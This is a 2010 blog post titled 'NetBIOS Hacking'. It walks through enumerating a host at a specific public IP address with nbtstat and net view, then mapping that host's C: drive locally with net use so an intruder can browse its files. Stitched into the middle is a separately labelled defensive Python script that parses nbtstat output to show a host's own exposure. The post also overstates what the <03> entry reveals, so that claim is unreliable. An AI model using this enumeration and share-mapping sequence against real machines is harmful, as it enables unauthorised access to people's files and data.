
Thursday, April 22, 2010

NetBIOS Hacking

NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an
Application Programming Interface (API) for client
software to access LAN resources.
By default it runs on port 139.
NetBIOS exposes various information about the computers
on a network, including computer name, username,
domain, group, and more.

The NBTSTAT Command

NBTSTAT is the command for manually interacting with
NetBIOS over TCP/IP.
To view all of the switches available with the nbtstat
command and their usage, type the following at the
command prompt:

C:\Windows>nbtstat

Sample NBTSTAT Response

C:\>nbtstat -A 117.200.160.174

    NetBIOS Remote Machine Name Table

Name                  Type      Status
----------------------------------------------
PRASANNA       <00>   UNIQUE    Registered
INSECURE LABS  <00>   GROUP     Registered
PRASANNA       <03>   UNIQUE    Registered
PRASANNA       <20>   UNIQUE    Registered
INSECURE LABS  <1e>   GROUP     Registered

MAC Address = 86-95-55-50-00-00


An intruder could use the output from an nbtstat query
against your machines to begin gathering information
about them.

"<03> in the above table is nothing but the username of
that system."
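
To see what your own machines give away, the following added example (not part of the original post) parses nbtstat -A output and labels each registered name with what it discloses. The suffix meanings are Microsoft's documented NetBIOS suffix assignments; the function names are made up for this example, and the sample input is the response shown above.

```python
import re

# NetBIOS name suffixes (the 16th byte of the name) and what each discloses.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service: computer name",
    ("00", "GROUP"): "Workgroup or domain name",
    ("03", "UNIQUE"): "Messenger service: computer name or logged-on user name",
    ("20", "UNIQUE"): "File Server service: host is offering shares",
    ("1E", "GROUP"): "Browser service elections: workgroup or domain name",
}
# A table row: name (may contain spaces), <suffix>, type, status.
ROW = re.compile(r"^\s*(.+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC = re.compile(r"MAC Address\s*=\s*((?:[0-9A-Fa-f]{2}-){5}[0-9A-Fa-f]{2})")

def parse_nbtstat(text):
    """Return (rows, mac) parsed from `nbtstat -A` output."""
    rows, mac = [], None
    for line in text.splitlines():
        row = ROW.match(line)
        if row:
            name, suffix, kind, status = row.groups()
            rows.append((name, suffix.upper(), kind, status))
        elif MAC.search(line):
            mac = MAC.search(line).group(1)
    return rows, mac

def exposure_report(text):
    """Summarise what a host's name table tells anyone who can query it."""
    rows, mac = parse_nbtstat(text)
    findings = [(name, suffix, SUFFIXES.get((suffix, kind), "Unrecognised suffix, review manually"))
                for name, suffix, kind, _ in rows]
    sharing = any(s == "20" and st == "Registered" for _, s, _, st in rows)
    return {"findings": findings, "mac": mac, "file_sharing_advertised": sharing}

# Sample input: the nbtstat response shown in this post (table rows and MAC line).
SAMPLE = """\
PRASANNA <00> UNIQUE Registered
INSECURE LABS <00> GROUP Registered
PRASANNA <03> UNIQUE Registered
PRASANNA <20> UNIQUE Registered
INSECURE LABS <1e> GROUP Registered
MAC Address = 86-95-55-50-00-00
"""

if __name__ == "__main__":
    report = exposure_report(SAMPLE)
    for name, suffix, meaning in report["findings"]:
        print(f"{name:<15} <{suffix}>  {meaning}")
    print("MAC:", report["mac"], "| shares advertised:", report["file_sharing_advertised"])
```

A registered <20> entry is the one to act on first, since it means the File Server service is answering on that host.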

The next step for an intruder would be to try to list
the open shares on the given computer, using the net
view command.
Here is an example of the Net View command:

C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174

Sharename   Type   Comment
----------------------------------------
C           Disk   Drive C:\
MySofts     Disk   My Softwares Collection
E           Disk   Drive E:\

The command was completed successfully.


This information would give the intruder a list of
shares, which he would then use in conjunction with the
Net Use command, a command used to enable a computer to
map a share to its local drive. Below is an example of
how an intruder would map the C share to
a local G: drive, which he could then browse.

C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>
